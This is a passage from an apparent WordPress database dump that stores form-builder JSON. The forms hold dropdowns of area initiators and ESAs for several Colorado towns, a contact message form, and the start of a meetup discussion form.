Area Initiators/ESA\'s\",\"admin_field_label\":\"Akron\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"Initiator-Renee Wholey\",\"value\":\"Initiator-Renee Wholey\",\"calc_value\":\"\",\"id\":0}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Akron\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_1688593527213\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_11\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Alamosa Area Initiators/ESA\'s\",\"admin_field_label\":\"Alamosa\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"Initiator- Larry Dixon\",\"value\":\"Initiator- Larry Dixon\",\"calc_value\":\"\",\"id\":0}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Alamosa\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_16902329942560.6099262939126653\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_19\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Berthoud Area Initiators/ESA\'s\",\"admin_field_label\":\"Berthoud\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"ESA/Initiator-Chris Gage\",\"value\":\"ESA/Initiator-Chris Gage\",\"calc_value\":\"\",\"id\":0}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Berthoud\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_16902338477780.5815995774149973\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_21\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Boulder Area Initiators/ESA\'s\",\"admin_field_label\":\"Boulder\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"ESA/Initiator-Roy Ludwick\",\"value\":\"ESA/Initiator-Roy Ludwick\",\"calc_value\":\"\",\"id\":0}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Boulder\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_1690428749142\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_12\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Broomfield Area Initiators/ESA\'s\",\"admin_field_label\":\"Broomfield\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"ESA/Initiator-James Fischer\",\"value\":\"ESA/Initiator-James Fischer\",\"calc_value\":\"\",\"image\":\"\",\"id\":0},{\"label\":\"Initiator-Laura Fischer\",\"value\":\"Initiator-Laura Fischer\",\"calc_value\":\"\",\"image\":\"\",\"id\":2}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Broomfield\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_16902330764980.869409204942602\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_13\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Centennial Area Initiators/ESA\'s\",\"admin_field_label\":\"Centennial \",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"ESA/Initiator-Raelin Harp\",\"value\":\"ESA/Initiator-Raelin Harp\",\"calc_value\":\"\",\"image\":\"\",\"id\":1},{\"label\":\"ESA/Initiator-Tim Kuss\",\"value\":\"ESA/Initiator-Tim Kuss\",\"calc_value\":\"\",\"image\":\"\",\"id\":2},{\"label\":\"ESA/Initiator-Jack Lile\",\"value\":\"ESA/Initiator-Jack Lile\",\"calc_value\":\"\",\"image\":\"\",\"id\":3}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Centennial\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_16902331756520.7081525327889\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_5\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Colorado Springs Area Initiators and ESAs\",\"admin_field_label\":\"Colorado Springs\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"Initiator-Joan Riester\",\"value\":\"Initiator-Joan Riester\",\"calc_value\":\"\",\"id\":0},{\"label\":\"ESA/Initiator-Bonnie Alexander-Reeves\",\"value\":\"ESA/Initiator-Bonnie Alexander-Reeves\",\"calc_value\":\"\",\"image\":\"\",\"id\":1},{\"label\":\"ESA/Initiator-Jane Taylor\",\"value\":\"ESA/Initiator-Jane Taylor\",\"calc_value\":\"\",\"image\":\"\",\"id\":2}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Colorado Springs\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_1689799106468\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_22\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Cortez Area Initiators and ESAs\",\"admin_field_label\":\"Cortez\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"Initiator-Sherry Yost\",\"value\":\"Initiator-Sherry Yost\",\"calc_value\":\"\",\"id\":0}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Cortez\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_16962008779970.5263114642111135\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_3\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Denver Area Initiators & ESA’s\",\"admin_field_label\":\"Denver Area\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"ESA/Initiator-Fred Bell\",\"value\":\"ESA/Initiator-Fred Bell\",\"calc_value\":\"\",\"id\":0},{\"label\":\"ESA/Initiator-Gordon Garland\",\"value\":\"ESA/Initiator-Gordon Garland\",\"calc_value\":\"\",\"id\":1},{\"label\":\"ESA/Initiator-Bette Jean Wagner\",\"value\":\"ESA/Initiator-Bette Jean Wagner\",\"calc_value\":\"\",\"image\":\"\",\"id\":2},{\"label\":\"Initiator-Mary Griggs\",\"value\":\"Initiator-Mary Griggs\",\"calc_value\":\"\",\"image\":\"\",\"id\":3}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Denver\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_1690233283174\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_20\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Durango Area Initiators & ESA’s\",\"admin_field_label\":\"Durango Area\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"Initiator-Kathleen Neal\",\"value\":\"Initiator-Kathleen Neal\",\"calc_value\":\"\",\"image\":\"\",\"id\":0}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Durango\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_16902339184730.08210709621871715\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_14\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Englewood Area Initiators & ESA’s\",\"admin_field_label\":\"Englewood\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"ESA/Initiator-Rolf Mueller-Uri\",\"value\":\"ESA/Initiator-Rolf Mueller-Uri\",\"calc_value\":\"\",\"id\":0}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Englewood\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_16902332895240.8467867237519503\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_15\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Franktown Area Initiators & ESA’s\",\"admin_field_label\":\"Franktown\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"ESA/Initiator-Kimberly Young\",\"value\":\"ESA/Initiator-Kimberly Young\",\"calc_value\":\"\",\"id\":0}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Franktown\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_16902333893330.8025827427501482\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_4\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Johnstown Area Initiators and ESA\'s\",\"admin_field_label\":\"Johnstown\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"Initiator-Barbara Schneider\",\"value\":\"Initiator-Barbara Schneider\",\"calc_value\":\"\",\"id\":0}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Johnstown\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_16897987033930.0135410202804076\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_6\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Longmont  Area Initiators and ESA\'s\",\"admin_field_label\":\"Longmont\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"ESA/Initiator-Francis de Geus\",\"value\":\"ESA/Initiator-Francis de Geus\",\"calc_value\":\"\",\"id\":0},{\"label\":\"Initiator-Vicki Cashman\",\"value\":\"Initiator-Vicki Cashman\",\"calc_value\":\"\",\"image\":\"\",\"id\":1},{\"label\":\"Initiator-Helaine Reiner\",\"value\":\"Initiator-Helaine Reiner\",\"calc_value\":\"\",\"image\":\"\",\"id\":2}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Longmont\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_16897991892640.746910324421532\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_16\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Louisville Area Initiators and ESA\'s\",\"admin_field_label\":\"Louisville\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"ESA/Initiator-Tom Boston\",\"value\":\"ESA/Initiator-Tom Boston\",\"calc_value\":\"\",\"id\":0},{\"label\":\"Initiator-Lisa Boston\",\"value\":\"Initiator-Lisa Boston\",\"calc_value\":\"\",\"image\":\"\",\"id\":1}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Louisville\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_16902335388080.3285199492495994\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_7\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Loveland  Area Initiators and ESA\'s\",\"admin_field_label\":\"Loveland\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"Initiator-Marcie Tucker\",\"value\":\"Initiator-Marcie Tucker\",\"calc_value\":\"\",\"id\":0},{\"label\":\"ESA/Initiator-Barry Frost\",\"value\":\"ESA/Initiator-Barry Frost\",\"calc_value\":\"\",\"image\":\"\",\"id\":1},{\"label\":\"ESA/Initiator-Gardiner Tucker\",\"value\":\"ESA/Initiator-Gardiner Tucker\",\"calc_value\":\"\",\"image\":\"\",\"id\":2}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Loveland\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_16897993001370.9088427868516005\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_18\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Niwot Area Initiators and ESA\'s\",\"admin_field_label\":\"Niwot\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"ESA/Initiator-Rebecca Crandell\",\"value\":\"ESA/Initiator-Rebecca Crandell\",\"calc_value\":\"\",\"image\":\"\",\"id\":0}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Niwot\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_16902337629510.2668238363417482\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_8\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Parker Area Initiators and ESA\'s\",\"admin_field_label\":\"Parker\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"Initiator-Pat Lafferty\",\"value\":\"Initiator-Pat Lafferty\",\"calc_value\":\"\",\"id\":0},{\"label\":\"ESA/Initiator-Melony Mont-Eton\",\"value\":\"ESA/Initiator-Melony Mont-Eton\",\"calc_value\":\"\",\"image\":\"\",\"id\":1},{\"label\":\"Initiator-Mike Mont-Eton\",\"value\":\"Initiator-Mike Mont-Eton\",\"calc_value\":\"\",\"image\":\"\",\"id\":2}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Parker\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_16897995029260.022690820881841156\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_9\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Pueblo Area Initiators and ESA\'s\",\"admin_field_label\":\"Pueblo\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"ESA/Initiator-Joe Wells\",\"value\":\"ESA/Initiator-Joe Wells\",\"calc_value\":\"\",\"id\":0}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Pueblo\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_16897996006050.802069635452753\"},{\"index\":7,\"element\":\"select\",\"attributes\":{\"name\":\"dropdown_10\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"dynamic_default_value\":\"\",\"label\":\"Pagosa Springs Area Initiators and ESA\'s\",\"admin_field_label\":\"Pagosa Springs\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select -\",\"advanced_options\":[{\"label\":\"Initiator-Lynnzie Sutton\",\"value\":\"Initiator-Lynnzie Sutton\",\"calc_value\":\"\",\"image\":\"\",\"id\":0},{\"label\":\"Initiator-Laurah Brock Young\",\"value\":\"Initiator-Laurah Brock Young\",\"calc_value\":\"\",\"image\":\"\",\"id\":1}],\"calc_value_status\":false,\"enable_image_input\":false,\"values_visible\":false,\"enable_select_2\":\"no\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":{\"type\":\"any\",\"status\":true,\"conditions\":[{\"field\":\"input_radio\",\"value\":\"Pagosa Springs\",\"operator\":\"=\"}]},\"randomize_options\":\"no\"},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"ff-edit-dropdown\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_16897996603530.7978087559983\"},{\"index\":3,\"element\":\"textarea\",\"attributes\":{\"name\":\"description\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"\",\"rows\":3,\"cols\":2,\"maxlength\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"Enter Your Message Here \",\"admin_field_label\":\"User Message\",\"label_placement\":\"\",\"help_message\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"title\":\"Text Area\",\"icon_class\":\"ff-edit-textarea\",\"template\":\"inputTextarea\"},\"uniqElKey\":\"el_1690145009415\"},{\"index\":17,\"element\":\"custom_html\",\"attributes\":[],\"settings\":{\"html_codes\":\"<p>This site is protected by reCAPTCHA and the Google <a href=\\\"https://policies.google.com/privacy\\\">Privacy Policy</a> and <a href=\\\"https://policies.google.com/terms\\\">Terms of Service</a> apply.</p>\\n\",\"conditional_logics\":{\"type\":\"any\",\"status\":false,\"conditions\":[{\"field\":\"\",\"value\":\"\",\"operator\":\"\"}]},\"container_class\":\"\"},\"editor_options\":{\"title\":\"Custom HTML\",\"icon_class\":\"ff-edit-html\",\"template\":\"customHTML\"},\"uniqElKey\":\"el_1690145191197\"}],\"submitButton\":{\"uniqElKey\":\"el_1524065200616\",\"element\":\"button\",\"attributes\":{\"type\":\"submit\",\"class\":\"\"},\"settings\":{\"align\":\"left\",\"button_style\":\"default\",\"container_class\":\"\",\"help_message\":\"\",\"background_color\":\"#1a7efb\",\"button_size\":\"md\",\"color\":\"#ffffff\",\"button_ui\":{\"type\":\"default\",\"text\":\"Submit Form\",\"img_url\":\"\"},\"normal_styles\":{\"backgroundColor\":\"#1a7efb\",\"borderColor\":\"#1a7efb\",\"color\":\"#ffffff\",\"borderRadius\":\"\",\"minWidth\":\"\"},\"hover_styles\":{\"backgroundColor\":\"#ffffff\",\"borderColor\":\"#1a7efb\",\"color\":\"#1a7efb\",\"borderRadius\":\"\",\"minWidth\":\"\"},\"current_state\":\"normal_styles\"},\"editor_options\":{\"title\":\"Submit Button\"}}}',0,'form',NULL,2,NULL,'2023-10-02 16:47:45'),(6,'New Meetup Discussion','published',NULL,'{\"fields\":[{\"index\":2,\"element\":\"input_name\",\"attributes\":{\"name\":\"names\",\"data-type\":\"name-element\"},\"settings\":{\"container_class\":\"\",\"admin_field_label\":\"\",\"conditional_logics\":[],\"label_placement\":\"\"},\"fields\":{\"first_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"first_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"First Name\",\"help_message\":\"\",\"visible\":true,\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"First Name field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}},\"middle_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"middle_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"\",\"required\":false},\"settings\":{\"container_class\":\"\",\"label\":\"Middle Name\",\"help_message\":\"\",\"error_message\":\"\",\"visible\":false,\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}},\"last_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"last_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"\",\"required\":false},\"settings\":{\"container_class\":\"\",\"label\":\"Last Name\",\"help_message\":\"\",\"error_message\":\"\",\"visible\":true,\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}}},\"editor_options\":{\"title\":\"Name Fields\",\"element\":\"name-fields\",\"icon_class\":\"icon-user\",\"template\":\"nameFields\"},\"uniqElKey\":\"el_1516797727681\"},{\"index\":7,\"element\":\"input_email\",\"attributes\":{\"type\":\"email\",\"name\":\"email\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"you@domain.com\"},\"settings\":{\"container_class\":\"\",\"label\":\"Email\",\"label_placement\":\"\",\"help_message\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"Email field is required\"},\"email\":{\"value\":true,\"message\":\"This field must contain a valid email\"}},\"conditional_logics\":[],\"is_unique\":\"no\",\"unique_validation_message\":\"Email address need to be unique.\",\"prefix_label\":\"\",\"suffix_label\":\"\"},\"editor_options\":{\"title\":\"Email\",\"icon_class\":\"icon-envelope-o\",\"template\":\"inputText\"},\"uniqElKey\":\"el_1516797731343\"},{\"index\":3,\"element\":\"select\",\"attributes\":{\"name\":\"department\",\"value\":\"\",\"id\":\"\",\"class\":\"\"},\"settings\":{\"label\":\"Department\",\"help_message\":\"\",\"container_class\":\"\",\"label_placement\":\"\",\"placeholder\":\"- Select Department -\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"Department field is required\"}},\"conditional_logics\":[],\"advanced_options\":[{\"label\":\"Web Design\",\"value\":\"Web Design\",\"calc_value\":\"\",\"image\":\"\",\"id\":0},{\"label\":\"Web Development\",\"value\":\"Web Development\",\"calc_value\":\"\",\"image\":\"\",\"id\":1},{\"label\":\"WordPress Development\",\"value\":\"WordPress Development\",\"calc_value\":\"\",\"image\":\"\",\"id\":2},{\"label\":\"DevOps\",\"value\":\"DevOps\",\"calc_value\":\"\",\"image\":\"\",\"id\":3}],\"enable_image_input\":false,\"calc_value_status\":false,\"dynamic_default_value\":\"\",\"randomize_options\":\"no\",\"enable_select_2\":\"no\",\"values_visible\":false},\"editor_options\":{\"title\":\"Dropdown\",\"icon_class\":\"icon-caret-square-o-down\",\"element\":\"select\",\"template\":\"select\"},\"uniqElKey\":\"el_1516797735245\"},{\"index\":1,\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"subject\",\"value\":\"\",\"class\":\"\",\"placeholder\":\"Type your 